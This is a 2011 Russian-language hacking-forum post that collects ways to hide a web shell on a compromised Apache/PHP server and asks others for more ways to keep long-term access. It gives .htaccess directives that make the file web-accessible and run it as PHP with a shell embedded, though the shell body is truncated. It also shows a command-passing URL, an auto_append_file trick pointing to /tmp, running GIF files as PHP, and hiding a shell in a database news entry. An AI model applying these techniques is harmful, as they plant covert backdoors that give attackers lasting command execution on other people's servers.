
14.10.2011, 11:54
|
|
Новичок
Регистрация: 07.07.2010
Сообщений: 0
С нами:
8341526
Репутация:
0
|
|
Собираю коллекцию способов, как спрятать шелл
1) Спрятать в .htaccess
# Override default deny rule to make .htaccess file accessible over web
Order allow,deny
Allow from all
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### &1"); ?>###### LLEHS ######
domain/path/.htaccess?c=command
2) Аппенд ко всем скриптам php_value auto_append_file "/tmp/httpconf.tmp"
3) Спрятать в гиф
.htaccess
AddType application/x-httpd-php gif
4) Записать шелл в базу данных, в неприметную новость
Какие еще хорошие способы спрятать шелл, чтобы долго удержаться в системе?
|
|
|